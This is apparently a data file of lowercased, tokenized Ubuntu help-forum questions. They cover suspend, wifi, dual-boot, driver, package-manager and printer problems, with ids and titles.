308188	keyboard does n't respond after suspend	when i put my ubuntu on suspend mode , the keyboard stops working , and i can not get out of suspend . i need to shutdown my laptop manually and reboot . i have lenovo s10-3 . help anybody ?
308193	change unlock screen appearance	i wonder if it 's possible to change the appearance of the unlock screen as i 'm not a big fan of this default greyish dialog box : ( image reference : http : //www.tuxgarage.com/2012/04/ubuntu-12-04-precise-pangolin-review.html ) i have literally no experience with applying any themes in ubuntu and whenever i 've tried to change a specific part of the interface i think i changed pretty much anything but the part i 'd like to change . therefore i 'm also not sure if it 's possible to just change this dialog box or if i 've to apply a broader theme . some explanation about the general structure would be very much appreciated . also some tips where to find fitting themes and how to apply them would come very handy - or just some links for tutorials explaining this task as i struggle to dig the net for some informational resource : )
308202	is it possible to enlarge ubuntu desktop somehow	is it possible to enlarge ubuntu desktop in a way that screen resolution was more than real resolution of display . i mean for example if i have monitor 1024x768 , but i want to set resolution wider and taller : 1200x800 ( as example ) . that would be great if this screen look and act like compiz enhanced zoom desktop . i mean when you move cursor to the corner-you can see what is in this corner . maybe someone know such application or settings , cause i 'm not satisfied about my display resolution and ca n't add another display..
308203	discrepancy between `apt-get upgrade` and update manager	i use ubuntu 12.04.2 and i 've just finished running apt-get update . according to apt-get upgrade , there are 5 packages to be upgraded , in a total of 1533 kb ; while the update manager indicates there are 52,8 mb in 13 pacakges . why the discrepancy ? ( also , why apt-get upgrade says 4 packages wo n't be upgraded ? ) output of apt-get upgrade ruda @ machine : ~ $ sudo apt-get upgrade lendo listas de pacotes ... pronto construindo árvore de dependências lendo informação de estado ... pronto os pacotes a seguir serão mantidos em suas versões atuais : libminiupnpc8 linux-generic linux-headers-generic linux-image-generic os pacotes a seguir serão atualizados : dbus dbus-x11 libdbus-1-3 libdbus-1-3 : i386 linux-libc-dev 5 pacotes atualizados , 0 pacotes novos instalados , 0 a serem removidos e 4 não atualizados . é preciso baixar 1.533 kb de arquivos . depois desta operação , 7.168 b adicionais de espaço em disco serão usados . packages marked by update manager output of sudo apt-get dist-upgrade -- simulate lendo listas de pacotes ... pronto construindo árvore de dependências lendo informação de estado ... pronto calculando atualização ... pronto os novos pacotes a seguir serão instalados : linux-headers-3.2.0-48 linux-headers-3.2.0-48-generic linux-image-3.2.0-48-generic minissdpd os pacotes a seguir serão atualizados : dbus dbus-x11 libdbus-1-3 libdbus-1-3 : i386 libminiupnpc8 linux-generic linux-headers-generic linux-image-generic linux-libc-dev 9 pacotes atualizados , 4 pacotes novos instalados , 0 a serem removidos e 0 não atualizados . inst libdbus-1-3 [ 1.4.18-1ubuntu1.3 ] ( 1.4.18-1ubuntu1.4 ubuntu:12.04/precise-updates [ amd64 ] ) [ libdbus-1-3 : amd64 on libdbus-1-3 : i386 ] [ libdbus-1-3 : i386 on libdbus-1-3 : amd64 ] [ libdbus-1-3 : i386 ] inst libdbus-1-3 : i386 [ 1.4.18-1ubuntu1.3 ] ( 1.4.18-1ubuntu1.4 ubuntu:12.04/precise-updates [ i386 ] ) conf libdbus-1-3 ( 1.4.18-1ubuntu1.4 ubuntu:12.04/precise-updates [ amd64 ] ) conf libdbus-1-3 : i386 ( 1.4.18-1ubuntu1.4 ubuntu:12.04/precise-updates [ i386 ] ) inst linux-image-3.2.0-48-generic ( 3.2.0-48.74 ubuntu:12.04/precise-updates [ amd64 ] ) inst dbus [ 1.4.18-1ubuntu1.3 ] ( 1.4.18-1ubuntu1.4 ubuntu:12.04/precise-updates [ amd64 ] ) inst dbus-x11 [ 1.4.18-1ubuntu1.3 ] ( 1.4.18-1ubuntu1.4 ubuntu:12.04/precise-updates [ amd64 ] ) inst libminiupnpc8 [ 1.6-3ubuntu1 ] ( 1.6-precise2 bitcoin - stable channel:12.04/precise [ amd64 ] ) inst linux-generic [ 3.2.0.45.54 ] ( 3.2.0.48.58 ubuntu:12.04/precise-updates [ amd64 ] ) [ ] inst linux-image-generic [ 3.2.0.45.54 ] ( 3.2.0.48.58 ubuntu:12.04/precise-updates [ amd64 ] ) [ ] inst linux-headers-3.2.0-48 ( 3.2.0-48.74 ubuntu:12.04/precise-updates [ all ] ) [ ] inst linux-headers-3.2.0-48-generic ( 3.2.0-48.74 ubuntu:12.04/precise-updates [ amd64 ] ) [ ] inst linux-headers-generic [ 3.2.0.45.54 ] ( 3.2.0.48.58 ubuntu:12.04/precise-updates [ amd64 ] ) inst linux-libc-dev [ 3.2.0-45.70 ] ( 3.2.0-48.74 ubuntu:12.04/precise-updates [ amd64 ] ) inst minissdpd ( 1.1.20111007-3 ubuntu:12.04/precise [ amd64 ] ) conf linux-image-3.2.0-48-generic ( 3.2.0-48.74 ubuntu:12.04/precise-updates [ amd64 ] ) conf dbus ( 1.4.18-1ubuntu1.4 ubuntu:12.04/precise-updates [ amd64 ] ) conf dbus-x11 ( 1.4.18-1ubuntu1.4 ubuntu:12.04/precise-updates [ amd64 ] ) conf libminiupnpc8 ( 1.6-precise2 bitcoin - stable channel:12.04/precise [ amd64 ] ) conf linux-image-generic ( 3.2.0.48.58 ubuntu:12.04/precise-updates [ amd64 ] ) conf linux-headers-3.2.0-48 ( 3.2.0-48.74 ubuntu:12.04/precise-updates [ all ] ) conf linux-headers-3.2.0-48-generic ( 3.2.0-48.74 ubuntu:12.04/precise-updates [ amd64 ] ) conf linux-headers-generic ( 3.2.0.48.58 ubuntu:12.04/precise-updates [ amd64 ] ) conf linux-generic ( 3.2.0.48.58 ubuntu:12.04/precise-updates [ amd64 ] ) conf linux-libc-dev ( 3.2.0-48.74 ubuntu:12.04/precise-updates [ amd64 ] ) conf minissdpd ( 1.1.20111007-3 ubuntu:12.04/precise [ amd64 ] )
308204	is there an ubuntu setup guide for pure-ftp-mysql ?	i 've used google to find out how to set up pure-ftp-mysql after installing it with apt-get on ubuntu but i ca n't find anything that is related to ubuntu . does anyone know where to find a ubuntu related post ?
308207	can battlefield 3 run on the current version of ubuntu ?	i am currently building a gaming pc of my own and was wanting to cut out the ridiculous cost of $ 100 for windows 7 or 8 for my budget build . is there any way that battlefield 3 could be ran with moderate to high settings with a high consistency on the current version of ubuntu ?
308208	intel hdmi audio no device listed	i 've tried the latest 3.9 kernel , and even downgrading to 3.8.0-17 ( as was recommended in another solution . ) it does n't show up in sound config . it does n't show up in aplay -l or pavucontrol . if there is anything else i can do , i would appreciate it . i hate losing sound output when my wife uses the tv ( and surround sound ) for her soap operas : (
308213	how to install luz ?	how would i install luz on ubuntu 13.04 ?
308218	wireless networks keeps stopping data exchange	recently , after a system update , my wireless network has being stopping to transfer data from some irregular time intervals that vary from 30 seconds to 20 minutes , and every time i need to plug off and then on the wireless adapter . i tried to update again the system several times and nothing changed . note that the network does n't disconnect , it remains connected although no data is exchanged , no uploads or downloads . reconnecting the wireless adapter in most of the times works , although sometimes when i reconnect it my wifi network is n't listed , then i have to click on `` connect to a hidden wireless network ... '' and then i will connect to my network . using ping ( ping 8.8.8.8 ) to see what happens , when data transfer stops i receive this message : ping : sendmsg : no buffer space available searching for solutions relating to this message i found that it can be the wireless router , so i reseted it and configured everything . the problem persisted . so i found out that a solution for this is to increase buffer size with this command : # echo 83886080 > /proc/sys/net/core/wmem_max i did that and it seemed to resolve the problem , although after a day it came back . i also noticed that when the wireless is crappy , like stopping connection in 20 to 20 seconds , when i click to shutdown the pc it does n't shutdown , it hangs on the purple screen written ubuntu and then i have to hold power button in order to restart the pc . i already tried using the wireless adapter in windows 8 , in this pc , and it works perfectly , already tried it in a notebook , both , ubuntu 13.04 and windows 8 worked perfectly .
308221	is gcc 4.8.1 release available under raring 13.04 ? ( no snapshot , only release )	i need full c++11 support and i need gcc 4.8.1 release , i 'm under ubuntu 13.04 64 bit , there is a gcc-snapshot package in the repository , but it 's outdated and it 's an old pre-release version . it 's possible to get an official support for the 4.8.1 ? it 's hidden somewhere in the repository ? please no ppa .
308222	time and date inside a video capture	which video capture programs exists with this option : time and date displayed inside the video ? i checked these programs , but i did n't find nothing in this sense .
308226	accessing window files in linux	after mounting the windows partition is the command prompt ( sudo mount -t ntfs /dev/sda2 /media/c ) i ca n't see the document files . the folders shown are boot , dell , preload , recovery , sources , system volume info . the other executable files are autorun/inf , bootmgr , desktop.ini , info.exe , master.log and a bunch of protect.dutch etc . how do you view the files ?
308227	is it possible to connect to pcanywhere host ?	is there any way to connect to a pcanywhere host on a windows machine from ubuntu 13.04 ? i would rather use a native linux program instead of installing pcanywhere on my machine with wine .
308234	problems with connection laptop to tv via hdmi	sorry for my english . i am from russia . laptop - compaq presario cq61 . ubuntu 13.04 tv - panasonic - viera tx-pr42c11 i need connect my laptop to tv via hdmi . when i had proprietary driver nvidia i could connect tv and it works as second monitor . but i couldnt change default resolution 1280x720 . my tv works good with 1176x664 . i tried to add necessary resolution using xrandr . but when i performed '' xrandr -- addmode hdmi-0 1176x664_60.00 '' it says that it wouldnt work because i used proprietary driver . then i have installed x.org x server driver . now i can add necessary resolution using xrandr . but when i connect tv it there isn`t any picture on it . please , answer my questions : 1 ) how can i add resolution 1176x664 if i use proprietary driver nvidia ? or 2 ) how make x.org x server work with tv ?
308235	change of keyboard layout wo n't apply	i have selected the german layout but the keyboard is still set to ( i guess ) english layout ( no ă¤ , ăś , etc and @ on shift + 2 ) . but if i change the layout to english and then back to german the change applies until i restart my pc . during the installation i selected german layout and there it worked properly during the installation but after the installation finished it changed .
308237	apt-get -- force-yes : how to suppress further questions	take the acroread orlibpam-ldap` packages as example token : even when installed with apt-get -- force-yes they will still ask questions : acroread wants to know , wheter acrobat should be standard pdf reader ( how to assume yes ? ) libpam-ldap : what 's your ldap-servers uri , version , password , ... ? ( how to just assume anything , the ldap.conf will be overwritten by puppet anyway ) is there a `` for god 's sake assume anything and stop nagging '' -switch for apt-get ?
308239	trouble connecting to wifi ubuntu 12.04	other questions in this vein have not really addressed the issue or were so technical that i did n't know if they addressed the issue or not . here is the problem : my wifi was connecting just fine until last update ( ca n't tell you which one because i am using windows to send this ) . now it is hit and miss . sometimes it connects right up and other times never after repeated attempts . seems to center on rejected password for wpa . my system is dual boot , so the wndows7 connects just fine . i try using earlier versions of ubuntu from the grub selection on boot , but it does n't seem to make any difference . i have uninstalled and reinstalled the gnome network manager and wicd . with no effect . i can do simple command line operations but get totally lost and frustrated with elaborate and uber-technical fixes . by way of editorial comment , i have had this issue with mint , suse and now ubuntu . seems to be a real weakness in linux distros . otherwise i absolutely love ubuntu .
308241	screen resolution lowers every time there is a kernel update	every time i get a kernel update , my screen resolution is lowered . i can fix this by switching the nvidia driver to a different version and then restarting . i think what is happening is that the nvidia driver module is not getting recompiled . is there any way i can fix this ? i have this workaround , but it 's very annoying .
308243	how do i activate pulseaudio when only being logged in via ssh ?	i am using a console-based music player , called cmus . it is in the repositories . if i ssh into my desktop computer from , say , a laptop and start cmus , i would like to be able to play music . but , if i 'm not logged in via gdm on the desktop computer , pulseaudio does n't seem to want to play sound . when i login via gdm on the desktop computer and start cmus through ssh , i do get sound . my question is : can i work around this somehow ? can i tell pulseaudio to be active even though i am not physically logged on the actual machine , but only remotely ? thanks for any and all help ! note : i am not trying to tunnel the sound through ssh . i instead want to enable the sound to come out of the speakers of the computer i ssh into . please note the difference . if all of this is unclear , please let me know and i 'll try my best to clarify !
308244	java program run problem	i have install java in my computer . when i doing compile java program it is successfully done but when i try to run program it show error like exception in thread `` main '' java.lang.unsupportedclassversionerror : example2 : unsupported major.minor version 51.0 at java.lang.classloader.defineclass1 ( native method ) at java.lang.classloader.defineclass ( classloader.java:634 ) at java.security.secureclassloader.defineclass ( secureclassloader.java:142 ) at java.net.urlclassloader.defineclass ( urlclassloader.java:277 ) at java.net.urlclassloader.access $ 000 ( urlclassloader.java:73 ) at java.net.urlclassloader $ 1.run ( urlclassloader.java:212 ) at java.security.accesscontroller.doprivileged ( native method ) at java.net.urlclassloader.findclass ( urlclassloader.java:205 ) at java.lang.classloader.loadclass ( classloader.java:321 ) at sun.misc.launcher $ appclassloader.loadclass ( launcher.java:294 ) at java.lang.classloader.loadclass ( classloader.java:266 ) could not find the main class : example2 . program will exit . what should i do ? ?
308248	sharing folder with guest	i am trying to allow access to the guest account to a folder at /share i have chmod 775 'd and even 777 'd the folder to no avail . i know the guest account is locked down so it cant access /home , /media , etc , but how do i allow the guest account to access ( rwx ) one folder . -- please note to those marking as duplicate - the answer here does not apply to 13.04 .
308249	gimp : how to extend .xcf file dimensions	i have a .xcf file created in gimp of 320x480 pixels size . now i want to extend it to 320x640 pixels with all the layers intact . i have an option of creating new file and copy each layer one by one . but thats too tiresome . it has around 50 layers . p.s . : i 'm using gimp 2.6
308250	is there a tool for removing metadata ?	the title says it all . is there a tool ? i installed exiftool , but ca n't find a way to remove all at once with one command .
308266	how do i install windows vista home premium onto ubuntu	how do i boot windows home premium onto ubuntu using ubuntu ?
308267	software updater not updating ubuntu 13.04	i think some settings have been changed and i can not update my ubuntu 13.04 using the software updater ... ..please help me as i am new to this os here are the screenshot of my problem.. if you need more info about the system please ask ...
308268	how to update ubuntu on a dual boot system without internet connection ?	i have windows 7 and ubuntu 10.4 on my lenovo g580 . i want to upgrade my ubuntu to 12.04 without removing windows is it possible ? just to add wifi/lan do not work with ubuntu 10.4 on my laptop due to driver issues . how to do it ?
308272	file sending through hotspot ?	hi is it possible to send files from my pc to mobile which is connected by hotspot from my pc . i am using ubuntu 13.04 . thank you for your answers .
308275	ubuntu failed to start	i have installed ubuntu ubuntu-12.04.2 amd64 on my new laptop . all installation went well without any problem . installation prompted me to restart the system and it restarted automatically . but , on reboot , ubuntu is not booting . i am able to boot from the usb drive without any problem but not from the hard disk . any help is greatly appreciated . thanks , kiran .
308278	is there an equivalent to book-keeping package `` pastel '' in ubuntu ?	here in south africa people use windows with a software package called pastel . it is a book keeping package for medium to very large corporates and have the monopoly here . are there any thing in that class for ubuntu ?
308285	/boot partition out of free space on standard install of 13.04	i installed ubuntu 13.04 a few weeks ago as a fresh install on my laptop . 64 bit , using full disc encryption . suddenly this message appears when updating the software . i looked in gparted , and sure enough there is a separate partition with /boot on , which is only 243mib . this is the first partition , on the drive - all following space is used by the encrypted filespace , which to me means that simply giving the /boot partition more space would be a tough task ... here 's a screenshot of my partitions . note that this is unaltered from the standard automatic install setup ... the only thing i did differently is choose to use full disc encryption .
308291	how can i get the correct lithuanian keyboard layout ?	i 'm running xubuntu 13.04 and i ca n't seem to get the right lithuanian keyboard layout . none of layouts listed below works correct correct lithuanian layout that i need : lithuanian symbols positioned in the place of digits : 1 for ą , 2 for č , 3 for ę , 4 for ė , 5 for į , 6 for š , 7 for ų , 8 for ū and = for ž . any help is greatly appreciated .
308293	connect galaxy nexus to ubuntu	i 'm trying to connect my galaxy nexus to an ubuntu 11.04 pc by following the instructions in this other post ( getting mtp enabled devices to work with ubuntu ? ) . i 've read it and redone each step about 10 times , but the best i can get from it when trying to access ( on terminal ) the directory /media/mygalaxynexus is the following error : ls : can not access /media/mygalaxynexus : transport endpoint is not connected total 0 d ? ? ? ? ? ? ? ? ? ? ? ? ? ? mygalaxynexus this is the result of the command cat ~/.bashrc ( only the part related to this post ... ) : alias android-connect= '' mtpfs -o allow_other /media/mygalaxynexus '' alias android-disconnect= '' fusermount -u /media/mygalaxynexus '' this is the result of the command cat /etc/udev/rules.d/51-android.rules : subsystem== '' usb '' , attr { idvendor } == '' 04e8 '' , attr { idproduct } == '' 685c '' , mode= '' 0666 '' this is the result of the command mtp-detect : libmtp version : 1.1.1 listing raw device ( s ) device 0 ( vid=04e8 and pid=685c ) is unknown . please report this vid/pid and the device model to the libmtp development team found 1 device ( s ) : 04e8:685c @ bus 2 , dev 3 i 've also found this useful link but neither that helped me . the best i was able to get by following it was to show a directory named playlist that was empty .
308297	how to copy a website inside my www to another computer and make it work ?	i have designed a website to create and sign certificates ( .csr , .key , .crt , .p12 ) in my netbook using ubuntu 12.04 . now i have to demonstrate that it works but my teacher wants to test it using a lab computer ( wired network ) and my laptop does n't have rj45 port . i need to copy my project , that is in www , to a lab computer . i have been trying with cp -r to a pendrive and then from this device to the machine , but it seems that i 'm doing something wrong in the way . also i cant find to launch index from www .
308317	dual boot windows 8 eufi and ubuntu on separate hard drives	i have ubuntu 13.04 installed and working fine , added a second hard drive and installed windows 8 on the second hard drive . now windows works fine but only if i have the ubuntu drive disconnected . ubuntu will not boot at all anymore even with the windows drive disconnected . how can i get both systems to boot ( dual boot ) . again right now it only works if i disconnect the ubuntu drive . thanks , steven reeves
308318	auto upload on ftp when file saved	i want to know if it is possible ( it should be ) to auto upload my files on ftp when they change . is there a batch script i can run in background ? thank you ! : d
308322	avery designpro in ubuntu	does avery designpro work in ubuntu through wine ? if so how do i launch the program ? how about avery wizard for microsoft office in libreoffice ?
308329	hive installation error	i am trying to install # hive on ubuntu 10.04 . i have successfully installed hadoop-1.0.4 ( single node cluster ) . after setting path environment variable when i am trying to launch hive getting error hadoop installation not in path . please help . hduser @ souparno-laptop : /usr/local/hadoop/hadoop-1.0.3/hive/hive-0.10.0 $ bin/hivemissing hive execution jar : /usr/local/hadoop/hadoop-1.0.3/hive/lib/hive-exec-*.jar
308330	keyboard not working when i hold any key ?	pleas someone help me i am new ubuntu user . when i press any key from my toshiba laptop satellite pro l 300 keyboard it 's not works properly but it is working one press one character type.i want to make it free like when i press any key form keyboard it must type characters till to release key.i am using ubuntu 12.04 ?
308331	unable to run postgresql 9.2	i followed an instruction on how to setup ubuntu 10.04 with postgressql $ psql or this : lucid @ ubuntu : ~ $ sudo -u postgres psql postgres [ sudo ] password for lucid : psql : could not connect to server : no such file or directory is the server running locally and accepting connections on unix domain socket `` /var/run/postgresql/.s.pgsql.5432 '' ? anyone knows a solution ?
308332	do you could use python in ubuntu phone ?	they will be able to create applications for the ubuntu phone with python language
308337	non-pae installer hangs after a brief flash 'installing release files ... ' ; how do i get past this ?	i have run ubuntu 10.04 lts , ubuntu 11.10 and lubuntu 12.04 ( non-pae ) minimal installers off a cd and after selecting keyboard layout , connecting to a wireless network and choosing the gb ubuntu server ( and when that failed , the main ubuntu server ) , i have n't been able to make any progress on the installation . the system just comes up with the purple background after server selection with a grey , type-able band at the bottom . i think what is happening is that i do n't get a partitioner ... even though i tried formatting it as unallocated and ext4 and they both did n't work ... should i have to pre-partition it and what as ? how do i fix this and/or what package should i file this bug under in launchpad ? specs : ( real laptop ) cpu : intel ( r ) pentium ( r ) m processor 1600mhz gpu : intel corporation 82852/855gm integrated graphics device ( rev 02 ) audio : oss sequencer device audio : intel 82801db-ich4 ( intel 82801db-ich4 ) audio : intel 82801db-ich4 ( intel 82801db-ich4 - iec958 ) audio : intel 82801db-ich4 ( intel 82801db-ich4 - adc2 ) audio : alsa timer device audio : alsa sequencer device audio : intel 82801db-ich4 ( intel 82801db-ich4 - mic2 adc ) audio : intel 82801db-ich4 audio : intel 82801db-ich4 ( intel 82801db-ich4 - mic adc ) network : loopback device interface network : pro/wireless 2200bg [ calexico2 ] network connection network : rtl-8139/8139c/8139c+ ram : 1gb cpu : only pae supported ( up to l/xubuntu 12.04 and ubuntu 11.10 supported ) hard drive : formatted with kde partition manager as unallocated ] ( output from the laptop from the hardware info widget on a slax livecd which no longer works ) note : there is a similar question here but fossfreedom told me to make a new question : p
308341	apps do n't run due to 'qmlscene : could not fins a qt installation of ' '' error	i followed this link to install the ubuntu touch core apps on my computer running 13.04 . but when i run the command ubuntu-calculator-app i get the error qmlscene : could not fins a qt installation of ''
308342	ubuntu 12.04 lts	i tried installing ubuntu 12.04 lts alongside my windows 8 by downloading the image and copying it to an empty dvd disk and tried booting it from the cd but it said some files are missing . anyone know what 's the problem ?
308350	how to edit the start menu	i installed ubuntu 13.04 on a new laptop but do n't know how to handle the system . i want to edit start menu , to group items , add or remove some , get rid of icons .
308351	link between photo and thumb in shotwell ( v 12 , db schema 15 , ubuntu 12.04 )	how do i find the corresponding thumb to a photo in shotwell , schema version 15 ? the thumb files seem to have hex numbering that does n't seem to correspond to anything in the photo table as far as i can tell .
308352	problem installing ubuntu on several computers	i am trying desperately to place ubuntu on four types of machines . so far i can not install to even one of them . my three machines are a mac desktop running os x , with a 2.6 intel core 2 duo processor . an acer laptop running windows 8 its serial is acer aspire 5735-4774 , a powerbook g4 17 '' mac , and finally i have a asus tf300 laptop i would like to try ubuntu in as well . i have been able to easily fragment disk drives for space for the installation , im able to get into the boot menu to run usb or off cd for all the machines . i have used retfit and unetbootin for the mac , and unetbootin for pc . my biggest problem i believe is finding a non corrupted .iso file from ubuntu . i have downloaded 12.04 and 13004 several times and last night i even tried the bit torrent way . i have even tried using the feature of unebootin to do so . no success so far . i am trying to get an .iso file to create a live cd ( boot disk ) so i can try ubuntu . any tips ? im about to walk away . these downloads take 1 1/2 hour and its so frustrating when they are corrupted . thank you in advance -- david
308356	creating a `` deadman '' switch using ubuntu to shutdown ec2 instance	i 've put together a simple `` deadman switch '' using upstart to automatically shutdown my ec2 instances after a period of time . i 'm doing this to avoid the dreaded monday morning blues when you realized you 've left a instance up and running all weekend ( and yes , i could use cloud watch but i was hoping for a very straightforward and easy solution ) . my question is that will i run afoul with any problems if my upstart script is simply : sleep +55m shutdown -h now i 'm worried that when the shutdown changes the run levels that it could have some negative consequences when it gets to the upstart process that is running the shutdown itself . thanks
308359	professional screencast with audio drawings and quizzes	i want to create some screencasts with audio using ubuntu . i also would like to be able to make `` drawings '' , like arrows pointing at different part of the screen , shade a part of the screen and leave a portion bright . optionally i would also like to insert quizzes so that the video can only proceed when the right answers have been inserted . this videos should then be uploaded on my website which uses wordpress . what software/s can i use to do this ?
308364	installed ubuntu on seperate partition and now ca n't boot into windows	i just installed ubuntu 13.04 on my windows 7 computer . i installed on a septate partitions , all my files are still in that partition , but now i am getting the ubuntu boot loader and it does not give me the option to boot into windows . how can i get back to windows . more information here is a image of my grub https : //docs.google.com/file/d/0b1o-mgl-cqbfwec4am5izedcue0/edit ? usp=sharing as you can see in the picture , grub has windows 8 while in fact i have windows 7 , which is installed on my dev/sda2 partition ( in the grub the thing that says `` windows 8 recovery environment '' . if anyone could give me a little more information and even if possible the code i would have to use i would greatly appreciated it .
308365	cut whole folder if it contains .jpg files	i am switching to ubuntu from w 7 . i have been using both for a while , and the perfect time has come to really switch just to ubuntu now that my w7 crashed for good . the big problem is , all my files are still organized in w7 . i know i can still access them thru ubuntu but who can really remember where all of them are . so what i need help with ( if possible ) is to search thru all folders ( and sub folders ) for a certain ( example ) .jpg ( or .png , etc ) file and if found cut that folder then paste it to another folder i have been trying with this : /media/aea2cc99a2cc6803/documentsandsettings/bon/documents -name `` *.cdr '' but this is as far as i 've got.. thank you all in advance , really appreciate your help !
308368	virtual box or other virtual machine installation and running	what is the exact procedure to get virtualbox running ? or are there reliable alternatives ?
308373	where to find qt 5 downloaded pack in my ubuntu 13.04 ( raring ringtail )	i 'm trying to locate the qt 5 package in my ubuntu 13.04 os ( hp compaq 6910 ) following the instructions given in get started where it says : alternatively , for those using ubuntu 13.04 or a development release : sudo add-apt-repository ppa : canonical-qt5-edgers/qt5-proper & & sudo add-apt-repository ppa : ubuntu-sdk-team/ppa & & sudo apt-get update & & sudo apt-get install ubuntu-sdk after downloading the package i just ca n't locate it . how do i locate/call the sdk if it does n't appear anywhere in my computer ?
308378	installing pcre from source ... make install error !	i was trying to install pcre as it was needed by swig which is needed for installing gem5 , anyway i am receiving this error after successful ./configure and make ( however it 's interesting that previous time i was installing swig it did n't ask for pcre ) : jalal @ mona : /research/jalal/gem5-dependencies/pcre $ sudo make install [ sudo ] password for jalal : make install-am make [ 1 ] : entering directory /research/jalal/gem5-dependencies/pcre ' make [ 2 ] : entering directory/research/jalal/gem5-dependencies/pcre ' test -z `` /usr/local/lib '' || /bin/mkdir -p `` /usr/local/lib '' /bin/bash ./libtool -- mode=install /usr/bin/install -c libpcre.la libpcreposix.la libpcrecpp.la '/usr/local/lib ' libtool : install : /usr/bin/install -c .libs/libpcre.so.1.2.1 /usr/local/lib/libpcre.so.1.2.1 libtool : install : ( cd /usr/local/lib & & { ln -s -f libpcre.so.1.2.1 libpcre.so.1 || { rm -f libpcre.so.1 & & ln -s libpcre.so.1.2.1 libpcre.so.1 ; } ; } ) libtool : install : ( cd /usr/local/lib & & { ln -s -f libpcre.so.1.2.1 libpcre.so || { rm -f libpcre.so & & ln -s libpcre.so.1.2.1 libpcre.so ; } ; } ) libtool : install : /usr/bin/install -c .libs/libpcre.lai /usr/local/lib/libpcre.la libtool : install : warning : relinking libpcreposix.la ' libtool : install : ( cd /research/jalal/gem5-dependencies/pcre ; /bin/bash /research/jalal/gem5-dependencies/pcre/libtool -- silent -- tag cc -- mode=relink gcc -fvisibility=hidden -g -o2 -version-info 0:2:0 -o libpcreposix.la -rpath /usr/local/lib libpcreposix_la-pcreposix.lo libpcre.la ) mv : can not movelibpcreposix.so.0.0.2 ' to libpcreposix.so.0.0.2u ' : permission denied libtool : install : error : relinklibpcreposix.la ' with the above command before installing it make [ 2 ] : * [ install-libltlibraries ] error 1 make [ 2 ] : leaving directory /research/jalal/gem5-dependencies/pcre ' make [ 1 ] : *** [ install-am ] error 2 make [ 1 ] : leaving directory /research/jalal/gem5-dependencies/pcre ' make : * [ install ] error 2
308379	support for amd mobility radeon hd 2xxx-4xxx in the near future ?	i am currently running a laptop with ubuntu 12.10 installed and a mobility radeon hd 4650 graphics card . from what i was able to find out , it seems amd as officially removed the support on any distribution running xserver 1.13 or higher . apparently the only solution is to downgrade the xserver to version 1.12 and install the old supported drivers . since i 'm fairly new to linux i would like to know if it is a safe procedure to downgrade xorg , or should i wait for an official release in the near future ? is something like that in the works ? it 's hard to believe amd dropped support for a graphics card perfectly able to run smoothly most modern titles . thanks in advance
308380	does ubuntu automatically delete older versions of software when there is an update for them ?	i run 12.04 lts and was wondering if by updating my firmware , do the old versions delete or will it all build up in my system and take up space ?
308385	how to start empathy hidden in 13.04 ?	how to start empathy in hidden mode in 13.04 ? this was possible in previous versions of ubuntu using empathy -h or empathy -- start-hidden . but , in 13.04 , if you auto-start empathy in hidden mode , you can not open the contacts window , even though empathy is running in the background . ( see bug 1179180 ) .
308387	how to open a terminal and go to my home directory	i installed ubuntu 13.04 . when i open terminal ctrl+alt+t it goes to ubuntu @ ubuntu . i want it to go to my home directory . also when i reboot it does not ask for my login it shows install option
308392	why does the nvidia-cuda-toolkit installer from nvidia install different files than apt-get nvidia-cuda-toolkit	i 'm in the process of installing cuda on an ubuntu 13.04 system with a geforc0e gtx 670mx graphics card . i first downloaded cuda_5.0.35-linux_64_ubuntu11.10-1.run from nvidia 's website . this installs a driver , nvidia 's cuda toolkit and some cuda samples . i then saw that i could install the drivers and toolkit using synaptic . so , i uninstalled and then reinstalled using synaptic 's nvidia-cuda-toolkit ( among other things ) . however , i did not see the same files installed - i.e . i do n't have /usr/local/cuda or /usr/local/cuda-5.0 directories , also nvcc is now in /usr/bin instead of /usr/local/cuda-5.0/bin . why does this difference exist ? should i reinstall cuda_5.0.35-linux_64_ubuntu11.10-1.run ? did the package managed toolkit install just put things in different places ( if so , where ) ? what 's the best way to proceed , before i start trying to learn cuda ?
308394	trying replace windows 8 with ubuntu 13.04	trying to replace windows 8 with ubuntu 13.04 , but hp 6000 pro keeps wanting to boot and repair in win8 despite having chosen dedicate to ubuntu during install . any ideas ? thanks
308396	how do i fix `` failed to look for applications online '' error when looking for a new default program online ?	i get the following error : failed to look for applications online gdbus.error : org.freedesktop.dbus.python.xdg.exceptions.parsingerror : traceback ( most recent call last ) : file `` /usr/lib/python2.7/dist-packages/defer/__init__.py '' , line 489 , in _inline_callbacks result = gen.send ( result ) file `` /usr/lib/python2.7/dist-packages/sessioninstaller/core.py '' , line 1030 , in _install_mime_types path ) ) file `` /usr/lib/python2.7/dist-packages/xdg/desktopentry.py '' , line 33 , in __init__ self.parse ( filename ) file `` /usr/lib/python2.7/dist-packages/xdg/desktopentry.py '' , line 42 , in parse inifile.parse ( self , file , [ `` desktop entry '' , `` kde desktop entry '' ] ) file `` /usr/lib/python2.7/dist-packages/xdg/inifile.py '' , line 81 , in parse raise parsingerror ( `` invalid line : `` + line , filename ) parsingerror : parsingerror in file '/usr/share/app-install/desktop/workrave : workrave.desktop ' , invalid line : - rsi ( repetitive strain injury ) oraz wspomaga rekonwalescencj\u0119 '' any ideas ? this happens when i right click a program , open with , other application ... , find applications on-line . then this error pops up .
308398	selecting large format paper : what printing options work ? [ resolved ]	i have an epson workforce wf-7520 . it has two input trays : the upper has letter paper ( 8½×11 '' ) , the lower has ledger ( 11×17 '' ) . everything i print comes out on letter , even if i select options like -o papersize=custom.11x17in , lower and send it a ledger sized document . how can i make the printer recognize the larger paper size ? my lpoptions for the printer are : mediatype/type : *plain ematte eultraglossy epremgloss epsglos epentry egcp envelope printquality/quality option : fasteconomy economy *normal fine quality highquality bestquality pagesize/size : custom.widthxheight a4 4x6in 5x7in a6 a5 a3 a3+ b4 b5 3.5x5in 5x8in 8x10in 169widesize 100x148mm envelope_10 envelopedl envelopec4 envelopec6 *letter legal a2 b3 inputslot/source : *autoselect papercassette1 papercassette2 color/color : *color grayscale borderless/borderless : *off on reduceenlarge/reduce/enlarge : *off byoutputpapersize bypercentage outputpaper/by output paper size : *samedocumentsize a4 4x6in 5x7in a6 a5 a3 a3+ b4 b5 3.5x5in 5x8in 8x10in 169widesize 100x148mm envelope_10 envelopedl envelopec4 envelopec6 letter legal scaleratio/by percentage : 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 *100 101 102 103 104 105 106 107 108 109 110 111 112 